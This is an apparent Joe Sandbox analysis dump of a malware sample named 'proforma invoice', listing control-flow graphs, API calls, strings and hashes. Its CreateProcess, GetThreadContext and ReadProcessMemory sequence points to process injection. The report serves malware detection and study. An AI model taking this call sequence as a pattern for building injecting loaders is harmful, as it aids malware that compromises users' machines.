ad902d-ad9045 ReadFile 551->556 552->551 558 ad8fcc-ad8fdb GetConsoleMode 552->558 553->539 559 ad8f3e-ad8f40 553->559 562 ad9047-ad904d 556->562 563 ad90a1-ad90ac GetLastError 556->563 558->551 565 ad8fdd-ad8fe1 558->565 559->539 560 ad8f42-ad8f6d 559->560 560->539 567 ad8f6f-ad8f82 560->567 562->563 572 ad904f 562->572 570 ad90ae-ad90c0 call acf2d9 call acf2c6 563->570 571 ad90c5-ad90c8 563->571 566 ad900f-ad9019 call ad29c8 564->566 565->556 573 ad8fe3-ad8ffd ReadConsoleW 565->573 566->521 567->539 575 ad8f84-ad8f86 567->575 568->564 569->534 570->564 582 ad90ce-ad90d0 571->582 583 ad9005-ad900b call acf2a3 571->583 579 ad9052-ad9064 572->579 580 ad8fff GetLastError 573->580 581 ad901e-ad9027 573->581 575->539 585 ad8f88-ad8fa8 575->585 579->566 589 ad9066-ad906a 579->589 580->583 581->579 582->566 583->564 585->539 593 ad906c-ad907c call ad8a61 589->593 594 ad9083-ad908e 589->594 606 ad907f-ad9081 593->606 599 ad909a-ad909f call ad88a1 594->599 600 ad9090 call ad8bb1 594->600 604 ad9095-ad9098 599->604 600->604 604->606 606->566
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 97c387b715740f6e6d184f25bdf7b9f0cb1af56f3b44ff28215958a4f91e215b
                  • Instruction ID: 5fa911cc808a6f814534c00d48f03339f712f44f9340dbd1754bbebf117d8a22
                  • Opcode Fuzzy Hash: 97c387b715740f6e6d184f25bdf7b9f0cb1af56f3b44ff28215958a4f91e215b
                  • Instruction Fuzzy Hash: 68C1E574904349AFDF11EFA8D841BEEBBB1BF19310F14405AE51AAB392CB34D941CB61
                  Function 02102630 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 607 2102630-21026de call 2100000 610 21026e5-210270b call 2103540 CreateFileW 607->610 613 2102712-2102722 610->613 614 210270d 610->614 621 2102724 613->621 622 2102729-2102743 VirtualAlloc 613->622 615 210285d-2102861 614->615 616 21028a3-21028a6 615->616 617 2102863-2102867 615->617 623 21028a9-21028b0 616->623 619 2102873-2102877 617->619 620 2102869-210286c 617->620 626 2102887-210288b 619->626 627 2102879-2102883 619->627 620->619 621->615 628 2102745 622->628 629 210274a-2102761 ReadFile 622->629 624 21028b2-21028bd 623->624 625 2102905-210291a 623->625 630 21028c1-21028cd 624->630 631 21028bf 624->631 632 210292a-2102932 625->632 633 210291c-2102927 VirtualFree 625->633 634 210289b 626->634 635 210288d-2102897 626->635 627->626 628->615 636 2102763 629->636 637 2102768-21027a8 VirtualAlloc 629->637 640 21028e1-21028ed 630->640 641 21028cf-21028df 630->641 631->625 633->632 634->616 635->634 636->615 638 21027aa 637->638 639 21027af-21027ca call 2103790 637->639 638->615 647 21027d5-21027df 639->647 644 21028fa-2102900 640->644 645 21028ef-21028f8 640->645 643 2102903 641->643 643->623 644->643 645->643 648 21027e1-2102810 call 2103790 647->648 649 2102812-2102826 call 21035a0 647->649 648->647 655 2102828 649->655 656 210282a-210282e 649->656 655->615 657 2102830-2102834 FindCloseChangeNotification 656->657 658 210283a-210283e 656->658 657->658 659 2102840-210284b VirtualFree 658->659 660 210284e-2102857 658->660 659->660 660->610 660->615
                  APIs
                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 02102701
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02102927
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655323945.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2100000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateFileFreeVirtual
                  • String ID:
                  • API String ID: 204039940-0
                  • Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                  • Instruction ID: dfe52d4454a7bffcd0b9d6bc066172a83d12ee4fdf549d27740e16ea99b2bf3a
                  • Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                  • Instruction Fuzzy Hash: DAA1F774E40219EBDB14CFA4C898BEEB7B5BF48304F208569E915BB2C0D7B59A41CF54
                  Function 00AA2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 671 aa2c63-aa2cd3 CreateWindowExW * 2 ShowWindow * 2
                  APIs
                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA2C91
                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA2CB2
                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00AA1CAD,?), ref: 00AA2CC6
                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00AA1CAD,?), ref: 00AA2CCF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$CreateShow
                  • String ID: AutoIt v3$edit
                  • API String ID: 1584632944-3779509399
                  • Opcode ID: b4b1c560c882b7b68b3a7352c3e6b1e6ea4278e55b7f215f01d276a58eb430f6
                  • Instruction ID: 654517136cac7bb3c8bf9c9ae99dfcf831e5f0ca6f49d396c91d233ab11100d2
                  • Opcode Fuzzy Hash: b4b1c560c882b7b68b3a7352c3e6b1e6ea4278e55b7f215f01d276a58eb430f6
                  • Instruction Fuzzy Hash: 80F0DA765503907AEB311B6FAC09E773EBDD7C6F50F12445AF908B35A0CA611890DAB8
                  Function 021023B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 163fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 786 21023b0-210252e call 2100000 call 21022a0 CreateFileW 793 2102530 786->793 794 2102535-2102545 786->794 795 21025e5-21025ea 793->795 797 2102547 794->797 798 210254c-2102566 VirtualAlloc 794->798 797->795 799 2102568 798->799 800 210256a-2102581 ReadFile 798->800 799->795 801 2102583 800->801 802 2102585-21025bf call 21022e0 call 21012a0 800->802 801->795 807 21025c1-21025d6 call 2102330 802->807 808 21025db-21025e3 ExitProcess 802->808 807->808 808->795
                  APIs
                    • Part of subcall function 021022A0: Sleep.KERNELBASE(000001F4), ref: 021022B1
                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02102521
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655323945.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2100000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateFileSleep
                  • String ID: 62W3WRBFJZENPNWJVR9WWVPG4PT
                  • API String ID: 2694422964-2720630962
                  • Opcode ID: 794c5fb1e6c31589a57396c03a699559355726a20bd2efffd66a0d2500b281c7
                  • Instruction ID: 9ab95c4fe811a7d7846cf92fc589efcb7bf6933ab4270655d3778e35da61840b
                  • Opcode Fuzzy Hash: 794c5fb1e6c31589a57396c03a699559355726a20bd2efffd66a0d2500b281c7
                  • Instruction Fuzzy Hash: 81615230D04288DBEF11DBA4D858BDFBB75AF19304F044199E658BB2C0D7BA1B45CB66
                  Function 00B12947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B12C05
                  • DeleteFileW.KERNEL32(?), ref: 00B12C87
                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B12C9D
                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B12CAE
                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B12CC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: File$Delete$Copy
                  • String ID:
                  • API String ID: 3226157194-0
                  • Opcode ID: 8fcdac5f836eada1f063c7c2574a7186685c8baaf479d6ba223d13d2cb0584f1
                  • Instruction ID: 287c0587019e182a2bc7a20f09509a90c6d3f765c2f0445b1b4b16ed20e236d9
                  • Opcode Fuzzy Hash: 8fcdac5f836eada1f063c7c2574a7186685c8baaf479d6ba223d13d2cb0584f1
                  • Instruction Fuzzy Hash: EFB14C72D00119ABDF11DBA4CD85EDEBBBDEF49350F5040AAF609E7141EB309A948FA1
                  Function 00AA3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 952 aa3b1c-aa3b27 953 aa3b99-aa3b9b 952->953 954 aa3b29-aa3b2e 952->954 955 aa3b8c-aa3b8f 953->955 954->953 956 aa3b30-aa3b48 RegOpenKeyExW 954->956 956->953 957 aa3b4a-aa3b69 RegQueryValueExW 956->957 958 aa3b6b-aa3b76 957->958 959 aa3b80-aa3b8b RegCloseKey 957->959 960 aa3b78-aa3b7a 958->960 961 aa3b90-aa3b97 958->961 959->955 962 aa3b7e 960->962 961->962 962->959
                  APIs
                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00AA3B0F,SwapMouseButtons,00000004,?), ref: 00AA3B40
                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00AA3B0F,SwapMouseButtons,00000004,?), ref: 00AA3B61
                  • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00AA3B0F,SwapMouseButtons,00000004,?), ref: 00AA3B83
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID: Control Panel\Mouse
                  • API String ID: 3677997916-824357125
                  • Opcode ID: 369f0fe24d2bac802ef00e719e7d5b9bdacdb6263c8dc3b08a069fa9e64e9ed2
                  • Instruction ID: 1c6c3f77131a88db3264d5a5e5ac40caa71353114347710129561b951e150dc0
                  • Opcode Fuzzy Hash: 369f0fe24d2bac802ef00e719e7d5b9bdacdb6263c8dc3b08a069fa9e64e9ed2
                  • Instruction Fuzzy Hash: EB112AB6511208FFDF218FA5DC85AAEBBB9EF05744B104459B806E7150D7719E409760
                  Function 021012A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateProcessW.KERNELBASE(?,00000000), ref: 02101A5B
                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02101AF1
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02101B13
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655323945.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2100000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                  • String ID:
                  • API String ID: 2438371351-0
                  • Opcode ID: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
                  • Instruction ID: 614a5f75b2a916e8fbabbcef4b61eacc8b93eeb37a15990deae64d4f42f1f9c9
                  • Opcode Fuzzy Hash: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
                  • Instruction Fuzzy Hash: EC620E30A54258DBEB24CFA4C854BDEB372EF58300F1091A9D11DEB2D0E7B99E81CB59
                  Function 00AADFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                  Download Yara Rule
                  Strings
                  • Variable must be of type 'Object'., xrefs: 00AF32B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID: Variable must be of type 'Object'.
                  • API String ID: 0-109567571
                  • Opcode ID: fec75968e057c9c7340389132a8c458489117afa45434e5ae871cae2bf47798c
                  • Instruction ID: 62852d6c09eb4c2ca203595fdd0ca022650f651a3cdb9b8621f08b72396b1f4d
                  • Opcode Fuzzy Hash: fec75968e057c9c7340389132a8c458489117afa45434e5ae871cae2bf47798c
                  • Instruction Fuzzy Hash: 8CC26771A00215CFCF24CF98C881AADB7F1FF5A310F248569E916AB291D775ED81CBA1
                  Function 00AA3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AE33A2
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AA3A04
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: IconLoadNotifyShell_String_wcslen
                  • String ID: Line:
                  • API String ID: 2289894680-1585850449
                  • Opcode ID: df3413dba8807c296cb20ecd2923ad212b7ea4e68ba74bf9fad801747df3aecd
                  • Instruction ID: 6ee7929052be2a5ba4590b35e3a00901c2ffea790ecf7f53a9c0d04f53d65f76
                  • Opcode Fuzzy Hash: df3413dba8807c296cb20ecd2923ad212b7ea4e68ba74bf9fad801747df3aecd
                  • Instruction Fuzzy Hash: CD31C472408300AACB21EB28DC46FEFB7E8AB45710F10491EF59A971D1DF749A48C7E6
                  Function 00ABFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                  Download Yara Rule
                  APIs
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00AC0668
                    • Part of subcall function 00AC32A4: RaiseException.KERNEL32(?,?,?,00AC068A,?,00B71444,?,?,?,?,?,?,00AC068A,00AA1129,00B68738,00AA1129), ref: 00AC3304
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00AC0685
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Exception@8Throw$ExceptionRaise
                  • String ID: Unknown exception
                  • API String ID: 3476068407-410509341
                  • Opcode ID: 8f3c92902f53200c96c6ca10815cf112f046b7dea9957746caf6232d865c0dd8
                  • Instruction ID: 2379d29aa15c45dc296b77c399c313ca54fe0eda36105070e9f236722beee241
                  • Opcode Fuzzy Hash: 8f3c92902f53200c96c6ca10815cf112f046b7dea9957746caf6232d865c0dd8
                  • Instruction Fuzzy Hash: B9F0C23490020DBB8F00BB64DD4AEDE7BAC5E00354F618579B814D65A2EFB1DA25C680
                  Function 00B13017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                  Download Yara Rule
                  APIs
                  • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00B1302F
                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B13044
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Temp$FileNamePath
                  • String ID: aut
                  • API String ID: 3285503233-3010740371
                  • Opcode ID: 88d1f87cff392d4d0d3b1bf1f5d99104bb84361694049390f1fd79b18db159ae
                  • Instruction ID: d0f77de379d5532870f631cfd3f167c996d42a227e90dec48ff3a68bc35dfb95
                  • Opcode Fuzzy Hash: 88d1f87cff392d4d0d3b1bf1f5d99104bb84361694049390f1fd79b18db159ae
                  • Instruction Fuzzy Hash: 20D05E7254032867DA20A7E4AC0EFCB3F6CDB04750F0002A1BA55E30A1DEB49984CBD0
                  Function 00B27F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00B282F5
                  • TerminateProcess.KERNEL32(00000000), ref: 00B282FC
                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 00B284DD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$CurrentFreeLibraryTerminate
                  • String ID:
                  • API String ID: 146820519-0
                  • Opcode ID: d8583663e7392ffd6a31a6bdbe2a845fbc53bc7bdd7fe8e86f4fe51ab918d5ca
                  • Instruction ID: edcdb04ed8f513ed5c04133d509c9acce9e6c4dc2db73653db593a7fed14a79e
                  • Opcode Fuzzy Hash: d8583663e7392ffd6a31a6bdbe2a845fbc53bc7bdd7fe8e86f4fe51ab918d5ca
                  • Instruction Fuzzy Hash: F1127B719083119FD714DF28D480B6ABBE5FF89318F14899DE8998B392CB31ED45CB92
                  Function 00AD5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a3765a17a088ad00a94604bc2f1e24b3ff6f8bdbeb21de5c8706ec742e1e045d
                  • Instruction ID: 2e863dba7697eb9b513e51b97f007d382b624d0aafe471c1628d29b9da0e7518
                  • Opcode Fuzzy Hash: a3765a17a088ad00a94604bc2f1e24b3ff6f8bdbeb21de5c8706ec742e1e045d
                  • Instruction Fuzzy Hash: 1D519D75D10A09AFDB21AFB8C945FEEBBB8AF05310F14005BF406AB391D7719A01DB61
                  Function 00AA10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA1BF4
                    • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA1BFC
                    • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA1C07
                    • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA1C12
                    • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA1C1A
                    • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA1C22
                    • Part of subcall function 00AA1B4A: RegisterWindowMessageW.USER32(00000004,?,00AA12C4), ref: 00AA1BA2
                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AA136A
                  • OleInitialize.OLE32 ref: 00AA1388
                  • CloseHandle.KERNEL32(00000000,00000000), ref: 00AE24AB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                  • String ID:
                  • API String ID: 1986988660-0
                  • Opcode ID: 50139ecaf387615226c9ec70deb04aa928b4eebe9c71e19c5c86942d66b262ea
                  • Instruction ID: 898d4cabcbd235c0f3dea2378916646e41f1220672ac38de7aa56b50b913bb9d
                  • Opcode Fuzzy Hash: 50139ecaf387615226c9ec70deb04aa928b4eebe9c71e19c5c86942d66b262ea
                  • Instruction Fuzzy Hash: 2A71ACB59212008FC388EFBDAD466553BE5FBA9344B558A6AD41ED73A1EF308480CF71
                  Function 00AD86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00AD85CC,?,00B68CC8,0000000C), ref: 00AD8704
                  • GetLastError.KERNEL32(?,00AD85CC,?,00B68CC8,0000000C), ref: 00AD870E
                  • __dosmaperr.LIBCMT ref: 00AD8739
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                  • String ID:
                  • API String ID: 490808831-0
                  • Opcode ID: a6ca98934e021c38785ca306c36c529d36a2cc6d3eb1aeaca82b3e6789af3521
                  • Instruction ID: 7f29f3d6a3f8b9f90d643b5500d71dd3fb4e38d7051e2bb148b320ade98312f8
                  • Opcode Fuzzy Hash: a6ca98934e021c38785ca306c36c529d36a2cc6d3eb1aeaca82b3e6789af3521
                  • Instruction Fuzzy Hash: 82016D33E056602AD6247734A945B7E7B598B92B74F39011FF81B9F3D2DEB8CC819290
                  Function 00B12FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                  Download Yara Rule
